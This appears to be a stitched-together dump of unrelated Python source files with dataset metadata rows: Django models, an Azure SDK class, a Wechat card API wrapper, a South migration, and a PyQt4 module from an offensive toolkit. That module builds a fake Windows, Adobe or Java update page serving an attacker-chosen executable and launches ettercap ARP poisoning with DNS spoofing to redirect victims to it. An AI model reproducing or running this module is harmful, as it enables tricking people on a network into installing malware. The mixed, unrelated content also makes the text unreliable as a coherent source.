name = models.CharField(max_length=30, unique=True)
max_output_rate = models.FloatField()
output = models.IntegerField()
max_capacity = models.FloatField()
def __str__(self):
return self.name
class ResourceType(models.Model):
name = models.CharField(max_length=30, unique=True)
requirements = models.ForeignKey('Resources', blank=True, null=True)
def __str__(self):
return self.name
class Mine(models.Model):
name = models.CharField(max_length=30, unique=True)
all_resources = models.ForeignKey('Resources')
coordinates = models.ForeignKey('Coordinates')
blueprint = models.IntegerField()
production_level = models.FloatField()
def __str__(self):
return self.name
class Coordinates(models.Model):
x = models.FloatField()
y = models.FloatField()
class Resource(models.Model):
amount = models.FloatField()
resource_type = models.ForeignKey('ResourceType')
class Resources(models.Model):
all_resources = models.ManyToManyField('Resource')
| mit | 5,290,383,118,267,450,000 | 27.88 | 72 | 0.695291 | false | 3.913279 | false | false | false |
stevenliuit/3vilTwinAttacker | Modules/AttackUp.py | 1 | 9722 | from PyQt4.QtGui import *
from PyQt4.QtCore import *
from os import getcwd,popen,chdir,walk,path,remove,stat,getuid
from Modules.DHCPstarvation import frm_dhcp_Attack,conf_etter
from platform import linux_distribution
from Core.Settings import frm_Settings
from re import search
import threading
from shutil import copyfile
class frm_update_attack(QMainWindow):
def __init__(self, parent=None):
super(frm_update_attack, self).__init__(parent)
self.form_widget = frm_WinSoftUp(self)
self.setCentralWidget(self.form_widget)
self.setWindowTitle("Windows Update Attack Generator ")
self.setWindowIcon(QIcon('rsc/icon.ico'))
self.config = frm_Settings()
self.loadtheme(self.config.XmlThemeSelected())
def loadtheme(self,theme):
if theme != "theme2":
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
else:
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
class frm_WinSoftUp(QWidget):
def __init__(self, parent=None):
super(frm_WinSoftUp, self).__init__(parent)
self.Main = QVBoxLayout()
self.control = None
self.module2 = frm_dhcp_Attack()
self.path_file = None
self.owd = getcwd()
self.GUI()
def GUI(self):
self.form = QFormLayout(self)
self.grid = QGridLayout(self)
self.grid1 = QGridLayout(self)
self.path = QLineEdit(self)
self.logBox = QListWidget(self)
self.path.setFixedWidth(400)
#combobox
self.cb_interface = QComboBox(self)
self.refresh_interface(self.cb_interface)
#label
self.lb_interface = QLabel("Network Adapter:")
# buttons
self.btn_open = QPushButton("...")
self.btn_start = QPushButton("Start DNS",self)
self.btn_stop = QPushButton("Stop",self)
self.btn_reload = QPushButton("refresh",self)
self.btn_start_server = QPushButton("Start Server",self)
# size
self.btn_open.setMaximumWidth(90)
self.btn_start.setFixedHeight(50)
self.btn_stop.setFixedHeight(50)
self.btn_start_server.setFixedHeight(50)
#icons
self.btn_start.setIcon(QIcon("rsc/start.png"))
self.btn_open.setIcon(QIcon("rsc/open.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.btn_reload.setIcon(QIcon("rsc/refresh.png"))
self.btn_start_server.setIcon(QIcon("rsc/server.png"))
# connect buttons
self.btn_start.clicked.connect(self.dns_start)
self.btn_open.clicked.connect(self.getpath)
self.btn_reload.clicked.connect(self.inter_get)
self.btn_start_server.clicked.connect(self.server_start)
self.btn_stop.clicked.connect(self.stop_attack)
# radionButton
self.rb_windows = QRadioButton("Windows Update",self)
self.rb_windows.setIcon(QIcon("rsc/winUp.png"))
self.rb_adobe = QRadioButton("Adobe Update", self)
self.rb_adobe.setIcon(QIcon("rsc/adobe.png"))
self.rb_java = QRadioButton("Java Update", self)
self.rb_java.setIcon(QIcon("rsc/java.png"))
self.grid.addWidget(self.rb_windows, 0,1)
self.grid.addWidget(self.rb_adobe, 0,2)
self.grid.addWidget(self.rb_java, 0,3)
# check interface
self.grid.addWidget(self.lb_interface,1,1)
self.grid.addWidget(self.cb_interface,1,2)
self.grid.addWidget(self.btn_reload, 1,3)
#grid 2
self.grid1.addWidget(self.btn_start_server,0,2)
self.grid1.addWidget(self.btn_start,0,3)
self.grid1.addWidget(self.btn_stop,0,4)
#form add layout
self.form.addRow(self.path,self.btn_open)
self.form.addRow(self.grid)
self.form.addRow(self.grid1)
self.form.addRow(self.logBox)
self.Main.addLayout(self.form)
self.setLayout(self.Main)
def stop_attack(self):
popen("killall xterm")
self.alt_etter("")
if path.isfile("Modules/Win-Explo/Windows_Update/index.html"):
remove("Modules/Win-Explo/Windows_Update/index.html")
if path.isfile("Modules/Win-Explo/Windows_Update/windows-update.exe"):
remove("Modules/Win-Explo/Windows_Update/windows-update.exe")
QMessageBox.information(self,"Clear Setting", "log cLear success ")
def inter_get(self):
self.refresh_interface(self.cb_interface)
def refresh_interface(self,cb):
self.module2 = frm_dhcp_Attack()
cb.clear()
n = self.module2.placa()
for i,j in enumerate(n):
if self.module2.get_ip_local(n[i]) != None:
if n[i] != "":
cb.addItem(n[i])
def server_start(self):
if len(self.path.text()) <= 0:
QMessageBox.information(self, "Path file Error", "Error in get the file path.")
else:
if self.rb_windows.isChecked():
directory = "Modules/Win-Explo/Windows_Update/"
self.logBox.addItem("[+] Set page Attack.")
try:
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
copyfile(self.path_file,directory+"windows-update.exe")
except OSError,e:
print e
if not getuid() != 0:
file_html = open("Modules/Win-Explo/Settings_WinUpdate.html","r").read()
settings_html = file_html.replace("KBlenfile", str(self.getSize(self.path_file))+"KB")
if path.isfile(directory+"index.html"):
remove(directory+"index.html")
confFile = open(directory+"index.html","w")
confFile.write(settings_html)
confFile.close()
self.t = threading.Thread(target=self.threadServer,args=(directory,),)
self.t.daemon = True
self.t.start()
else:
QMessageBox.information(self, "Permission Denied", 'the Tool must be run as root try again.')
self.logBox.clear()
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
def dns_start(self):
if self.control != None:
self.logBox.addItem("[+] Settings Etter.dns.")
ipaddress = self.module2.get_ip_local(str(self.cb_interface.currentText()))
config_dns = ("* A %s"%(ipaddress))
self.path_file_etter = self.find("etter.dns", "/etc/ettercap/")
self.logBox.addItem("[+] check Path Ettercap.")
if self.path_file_etter == None:
self.path_file_etter = self.find("etter.dns", "/usr/share/ettercap/")
if not self.path_file_etter != None:
QMessageBox.information(self, 'Path not Found', "the file etter.dns not found check if ettercap this installed")
if self.path_file_etter != None:
self.alt_etter(config_dns)
self.thread2 = threading.Thread(target=self.ThreadDNS, args=(str(self.cb_interface.currentText()),))
self.thread2.daemon = True
self.thread2.start()
else:
QMessageBox.information(self, 'Server Phishing Error', "Error not start Server...")
def threadServer(self,directory):
self.logBox.addItem("[+] Get IP local network.")
ip = self.module2.get_ip_local(self.cb_interface.currentText())
try:
chdir(directory)
except OSError:
pass
popen("service apache2 stop")
self.control = 1
n = (popen("""xterm -geometry 75x15-1+0 -T "Windows Fake update " -e php -S %s:80"""%(ip))).read() + "exit"
chdir(self.owd)
while n != "dsa":
if n == "exit":
self.logBox.clear()
n = "dsa"
self.control = None
if path.isfile(directory+"index.html") and path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
remove(directory+"index.html")
break
def ThreadDNS(self,interface):
self.logBox.addItem("[+] Start Attack all DNS.")
distro = linux_distribution()
if search("Kali Linux",distro[0]):
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof // //"""%(interface,interface)).read()) + "exit"
else:
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof """%(interface,interface)).read()) + "exit"
while n != "dsa":
if n == "exit":
#self.dns_status(False)
self.logBox.clear()
n = "dsa"
break
def getpath(self):
file = QFileDialog.getOpenFileName(self, 'Open Executable file',filter='*.exe')
if len(file) > 0:
self.path_file = file
self.path.setText(file)
def alt_etter(self,data):
configure = conf_etter(data)
file = open(self.path_file_etter, "w")
file.write(configure)
file.close()
def find(self,name, paths):
for root, dirs, files in walk(paths):
if name in files:
return path.join(root, name)
def getSize(self,filename):
st = stat(filename)
return st.st_size | mit | -4,197,046,734,792,370,000 | 41.273913 | 174 | 0.578688 | false | 3.674225 | true | false | false |
lmazuel/azure-sdk-for-python | azure-mgmt-datafactory/azure/mgmt/datafactory/models/filter_activity.py | 1 | 2393 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .control_activity import ControlActivity
class FilterActivity(ControlActivity):
"""Filter and return results from input array based on the conditions.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:param name: Activity name.
:type name: str
:param description: Activity description.
:type description: str
:param depends_on: Activity depends on condition.
:type depends_on: list[~azure.mgmt.datafactory.models.ActivityDependency]
:param type: Constant filled by server.
:type type: str
:param items: Input array on which filter should be applied.
:type items: ~azure.mgmt.datafactory.models.Expression
:param condition: Condition to be used for filtering the input.
:type condition: ~azure.mgmt.datafactory.models.Expression
"""
_validation = {
'name': {'required': True},
'type': {'required': True},
'items': {'required': True},
'condition': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'name': {'key': 'name', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'depends_on': {'key': 'dependsOn', 'type': '[ActivityDependency]'},
'type': {'key': 'type', 'type': 'str'},
'items': {'key': 'typeProperties.items', 'type': 'Expression'},
'condition': {'key': 'typeProperties.condition', 'type': 'Expression'},
}
def __init__(self, name, items, condition, additional_properties=None, description=None, depends_on=None):
super(FilterActivity, self).__init__(additional_properties=additional_properties, name=name, description=description, depends_on=depends_on)
self.items = items
self.condition = condition
self.type = 'Filter'
| mit | -4,644,261,528,565,139,000 | 41.732143 | 148 | 0.623903 | false | 4.398897 | false | false | false |
OctavianLee/Pywechat | pywechat/services/wechat_card.py | 1 | 16043 | # -*- coding: utf-8 -*-
from pywechat.services.basic import Basic
class CardService(Basic):
"""This class is an implement of the Wechat service of card.
All request's urls come from the official documents.
Link: https://mp.weixin.qq.com/wiki/home/index.html
"""
def upload_image(self, image):
"""Uploads the image for the logo of card.
Link:
https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
Args:
image: the file of image. open(image_name, 'rb')
Returns:
the json data.Example:
{"url":"http://mmbiz.qpic.cn/mmbiz/iaL1LJM1mF9aRKPZJkm/0"}
Raises:
WechatError: to raise the exception if it contains the error.
"""
url = 'https://api.weixin.qq.com/cgi-bin/media/uploadimg'
files = {'buffer': image}
json_data = self._send_request('post', url, files=files)
return json_data
def get_colors(self):
"""Gets the available colors of cards.
Link:
https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"colors":[
{"name":"Color010","value":"#55bd47"},
{"name":"Color020","value":"#10ad61"},
{"name":"Color030","value":"#35a4de"},
{"name":"Color040","value":"#3d78da"},
{"name":"Color050","value":"#9058cb"},
{"name":"Color060","value":"#de9c33"},
{"name":"Color070","value":"#ebac16"},
{"name":"Color080","value":"#f9861f"},
{"name":"Color081","value":"#f08500"},
{"name":"Color090","value":"#e75735"},
{"name":"Color100","value":"#d54036"},
{"name":"Color101","value":"#cf3e36"}
]
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
url = 'https://api.weixin.qq.com/card/getcolors'
json_data = self._send_request('get', url)
return json_data
def create_card(
self, card_dict, card_type, date_info,
logo_url, code_type, brand_name, title,
color, notice, description, quantity,
**infos):
"""Creates a card.
Link:
https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
Returns:
the json data.Example:
{
"card": {
"card_type": "GROUPON",
"groupon": {
"base_info": {
"logo_url": "http://mmbiz.qpic.cn/mmbiz/iaL1LJM1mF9aRK/0",
"brand_name":"海底捞",
"code_type":"CODE_TYPE_TEXT",
"title": "132元双人火锅套餐",
"sub_title": "周末狂欢必备",
"color": "Color010",
"notice": "使用时向服务员出示此券",
"service_phone": "020-88888888",
"description": "不可与其他优惠同享\n如需团购券发票,请在消费时向商户提出\n店内均可使用,仅限堂食",
"date_info": {
"type": 1,
"begin_timestamp": 1397577600,
"end_timestamp": 1422724261
},
"sku": {
"quantity": 50000000
},
"get_limit": 3,
"use_custom_code": false,
"bind_openid": false,
"can_share": true,
"can_give_friend": true,
"location_id_list": [123, 12321, 345345],
"custom_url_name": "立即使用",
"custom_url": "http://www.qq.com",
"custom_url_sub_title": "6个汉字tips",
"promotion_url_name": "更多优惠",
"promotion_url": "http://www.qq.com",
"source": "大众点评"
},
"deal_detail": "以下锅底2选1(有菌王锅、麻辣锅、大骨锅、番茄锅、清补凉锅、酸菜鱼锅可选):\n大锅1份
12元\n小锅2份16元"}
}
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
base_info = {
"logo_url": logo_url,
"brand_name": brand_name,
"title": title,
"code_type": code_type,
"color": color,
"notice": notice,
"description": description,
"sku": {
"quantity": quantity
},
"date_info": date_info
}
base_info.update(infos)
data = {
"card": {
"card_type": card_type.upper(),
card_type.lower(): {
"base_info": base_info
}
}
}
data["card"][card_type].update(card_dict)
url = 'https://api.weixin.qq.com/card/create'
json_data = self._send_request('post', url, data=data)
return json_data
def create_qrcode(self, code, **infos):
"""Creates a qr code.
(Link:
https://mp.weixin.qq.com/wiki/12/ccd3aa0bddfe5211aace864de00b42e0.html)
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"ticket":"gQG28DoAAAAAAAAAASxodHRwOi8vd2VpeGluLnFxLmN=="
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
card_dict = {
"code": code
}
card_dict.update(infos)
data = {
"action_name": "QR_CARD",
"action_info": {
"card": {
card_dict
}
}
}
url = 'https://api.weixin.qq.com/card/qrcode/create'
json_data = self._send_request('post', url, data=data)
return json_data
def unavailable_code(self, code, card_id=None):
"""Sets the code is unavailable.
Link:
https://mp.weixin.qq.com/wiki/5/3e7bccd4a8082733b2c86c3dcc9a636d.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"card":{"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc"},
"openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"code": code
}
if card_id:
data["card_id"] = card_id
url = 'https://api.weixin.qq.com/card/code/unavailable'
json_data = self._send_request('post', url, data=data)
return json_data
def decrypt_code(self, encrypt_code):
"""Decrypts the code.
Link:
https://mp.weixin.qq.com/wiki/5/3e7bccd4a8082733b2c86c3dcc9a636d.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"card":{"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc"},
"openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"encrypt_code": encrypt_code
}
url = 'https://api.weixin.qq.com/card/code/decrtpt'
json_data = self._send_request('post', url, data=data)
return json_data
def get_code(self, code, card_id=None):
"""Get the code.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA",
"card":{
"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc",
"begin_time": 1404205036,
"end_time": 1404205036,
}
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"code": code
}
if card_id:
data["card_id"] = card_id
url = 'https://api.weixin.qq.com/card/code/get'
json_data = self._send_request('post', url, data=data)
return json_data
def get_card(self, card_id):
"""Get the card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"card": {
"card_type": "GROUPON",
"groupon": {
"base_info": {
"logo_url": "http://mmbiz.qpic.cn/mmbiz/iaL1LJM1mF9aRKPZJkmG8x/0",
"brand_name":"海底捞",
"code_type":"CODE_TYPE_TEXT",
"title": "132元双人火锅套餐",
"sub_title": "周末狂欢必备",
"color": "Color010",
"notice": "使用时向服务员出示此券",
"service_phone": "020-88888888",
"description": "不可与其他优惠同享\n如需团购券发票,请在消费时向商户提出\n店内均可使用,仅限堂食",
"date_info": {
"type": 1,
"begin_timestamp": 1397577600,
"end_timestamp": 1422724261
},
"sku": {
"quantity": 50000000
},
"get_limit": 3,
"use_custom_code": false,
"bind_openid": false,
"can_share": true,
"can_give_friend": true,
"location_id_list": [123, 12321, 345345],
"custom_url_name": "立即使用",
"custom_url": "http://www.qq.com",
"custom_url_sub_title": "6个汉字tips",
"promotion_url_name": "更多优惠",
"promotion_url": "http://www.qq.com",
"source": "大众点评"
},
"deal_detail": "以下锅底2选1(有菌王锅、麻辣锅、大骨锅、番茄锅、清补凉锅、酸菜鱼锅可选):\n大锅1份
12元\n小锅2份16元"}
}
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"card_id": card_id
}
url = 'https://api.weixin.qq.com/card/get'
json_data = self._send_request('post', url, data=data)
return json_data
def batchget_card(self, offset, count):
"""Get a list of cards.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"card_id_list":["ph_gmt7cUVrlRk8swPwx7aDyF-pg"],
"total_num":1
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"offset": offset,
"count": count
}
url = 'https://api.weixin.qq.com/card/batchget'
json_data = self._send_request('post', url, data=data)
return json_data
def update_card(
self, card_id, card_type,
logo_url, notice, description, color, detail=None,
bonus_cleared=None, bonus_rules=None, balance_rules=None, prerogative=None,
**infos):
"""Updates a card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
base_info = {
"logo_url": logo_url,
"notice": notice,
"description": description,
"color": color,
"detail": detail
}
base_info.update(infos)
data = {
"card_id": card_id,
card_type.lower(): {
"base_info": base_info,
"bonus_cleared": bonus_cleared,
"bonus_rules": bonus_rules,
"balance_rules": balance_rules,
"prerogative": prerogative
}
}
url = 'https://api.weixin.qq.com/card/update'
json_data = self._send_request('post', url, data=data)
return json_data
def modify_stock(
self, card_id,
increase_stock_value=None,
reduce_stock_value=None):
"""Modifies the stock of a card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"card_id": card_id,
}
if increase_stock_value:
data["increase_stock_value"] = increase_stock_value
if reduce_stock_value:
data["reduce_stock_value"] = reduce_stock_value
url = 'https://api.weixin.qq.com/card/modifystock'
json_data = self._send_request('post', url, data=data)
return json_data
def update_code(self, code, new_code, card_id=None):
"""Updates the code.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"code": code,
"new_code": new_code
}
if card_id:
data["card_id"] = card_id
url = 'https://api.weixin.qq.com/card/code/update'
json_data = self._send_request('post', url, data=data)
return json_data
def delete_card(self, card_id):
"""Deletes the card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"card_id": card_id
}
url = 'https://api.weixin.qq.com/card/delete'
json_data = self._send_request('post', url, data=data)
return json_data
| mit | 8,913,607,778,783,713,000 | 30.793456 | 95 | 0.447932 | false | 3.574845 | false | false | false |
pculture/mirocommunity | localtv/migrations/0010_remove_author.py | 1 | 14261 | from south.db import db
from django.db import models
from localtv.models import *
class Migration:
def forwards(self, orm):
# Dropping ManyToManyField 'Feed.auto_authors'
db.delete_table('localtv_feed_auto_authors')
# Dropping ManyToManyField 'Video.authors'
db.delete_table('localtv_video_authors')
# Deleting model 'author'
db.delete_table('localtv_author')
def backwards(self, orm):
# Adding ManyToManyField 'Feed.auto_authors'
db.create_table('localtv_feed_auto_authors', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('feed', models.ForeignKey(orm.Feed, null=False)),
('author', models.ForeignKey(orm.author, null=False))
))
# Adding ManyToManyField 'Video.authors'
db.create_table('localtv_video_authors', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('video', models.ForeignKey(orm.Video, null=False)),
('author', models.ForeignKey(orm.author, null=False))
))
# Adding model 'author'
db.create_table('localtv_author', (
('site', orm['localtv.author:site']),
('logo', orm['localtv.author:logo']),
('id', orm['localtv.author:id']),
('name', orm['localtv.author:name']),
))
db.send_create_signal('localtv', ['author'])
models = {
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sites.site': {
'Meta': {'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'localtv.savedsearch': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'query_string': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'when_created': ('django.db.models.fields.DateTimeField', [], {})
},
'localtv.video': {
'authors_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'embed_code': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Feed']", 'null': 'True', 'blank': 'True'}),
'file_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'file_url_length': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'file_url_mimetype': ('django.db.models.fields.CharField', [], {'max_length': '60', 'blank': 'True'}),
'flash_enclosure_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_featured': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'search': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.SavedSearch']", 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Tag']", 'blank': 'True'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'thumbnail_url': ('django.db.models.fields.URLField', [], {'max_length': '400', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video_service_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'video_service_user': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_approved': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 9, 10, 10, 14, 13, 997982)'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 9, 10, 10, 14, 13, 997849)'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
},
'localtv.sitelocation': {
'about_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'admins_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'background': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'css': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'display_submit_button': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'footer_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'frontpage_style': ('django.db.models.fields.CharField', [], {'default': "'list'", 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'sidebar_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']", 'unique': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'submission_requires_login': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'tagline': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'})
},
'localtv.tag': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'localtv.watch': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Video']"})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'localtv.category': {
'Meta': {'unique_together': "(('slug', 'site'), ('name', 'site'))"},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'child_set'", 'blank': 'True', 'null': 'True', 'to': "orm['localtv.Category']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'localtv.author': {
'Meta': {'unique_together': "(('name', 'site'),)"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"})
},
'localtv.feed': {
'Meta': {'unique_together': "(('feed_url', 'site'),)"},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'auto_authors_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'auto_categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
